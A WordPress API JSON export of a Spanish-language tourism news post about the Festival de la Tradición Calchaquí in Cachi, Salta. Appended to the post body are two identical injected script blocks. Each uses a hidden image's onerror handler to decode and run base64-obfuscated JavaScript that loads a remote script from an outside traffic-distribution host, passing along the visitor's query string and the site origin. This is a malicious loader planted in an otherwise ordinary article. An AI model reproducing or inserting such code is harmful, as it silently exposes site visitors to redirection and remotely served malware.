{"id":2053,"date":"2023-01-08T22:29:52","date_gmt":"2023-01-09T01:29:52","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2053"},"modified":"2025-08-14T00:26:01","modified_gmt":"2025-08-14T03:26:01","slug":"el-13-y-14-de-enero-cachi-espera-a-turistas-con-el-festival-de-la-tradicion-calchaqui","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2053","title":{"rendered":"El 13 y 14 de enero Cachi espera a turistas con el Festival de la Tradici\u00f3n Calchaqu\u00ed"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#e10a40\"><em>En la regi\u00f3n tur\u00edstica Valles Calchaqu\u00edes, a 165 kil\u00f3metros de la ciudad de Salta, se encuentra esta localidad que convoca a visitantes de todo el mundo.<\/em><\/h4>\n\n\n\n<p>Los festivales organizados durante el verano por los municipios componen uno de los puntos fuertes del calendario de verano, principalmente en los Valles Calchaqu\u00edes, donde ya comenzaron a realizarse con una gran convocatoria.<\/p>\n\n\n\n<p>Este fin de semana fue el turno del Festival el Seclante\u00f1o, en la localidad de Seclant\u00e1s y el 13 y 14 de enero ser\u00e1 el turno del Festival de la Tradici\u00f3n Calchaqu\u00ed, uno de los m\u00e1s importantes del calendario y que recibir\u00e1 a los visitantes con una variada cartelera de artistas. Ser\u00e1 la 30\u00b0 edici\u00f3n y de un evento que se consolid\u00f3 en el tiempo.<\/p>\n\n\n\n<p>En el escenario Ariel Petrocelli pasar\u00e1n destacados artistas para todos los gustos: Los Tekis, Canto del Alma, Hern\u00e1n Arias, La Repandilla, Luc\u00eda Guanca, \u00c1ngela Leiva, Alma Chaque\u00f1a, Canto 4, Las Voces de Or\u00e1n, entre otros.<\/p>\n\n\n\n<p>Hasta el 12 de enero, en la Casa de la Cultura, Caseros 460, estar\u00e1n disponibles las entradas para el XXX Festival de la Tradici\u00f3n Calchaqu\u00ed. Los horarios de venta comprenden turno ma\u00f1ana y turno tarde, de 10 a 13 y de 17 a 21.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-13-y-14-de-enero-cachi-espera-a-turistas-con-el-festival-de-la-tradicion-calchaqui-87201\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En la regi\u00f3n tur\u00edstica Valles Calchaqu\u00edes, a 165 kil\u00f3metros de la ciudad de Salta, se encuentra esta localidad que convoca a visitantes de todo el mundo. Los festivales organizados durante el verano por los municipios componen uno de los puntos fuertes del calendario de verano, principalmente en los Valles Calchaqu\u00edes, donde ya comenzaron a realizarse [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2054,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-2053","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2053"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2053"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2053\/revisions"}],"predecessor-version":[{"id":7215,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2053\/revisions\/7215"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2054"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2053"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2053"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2053"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}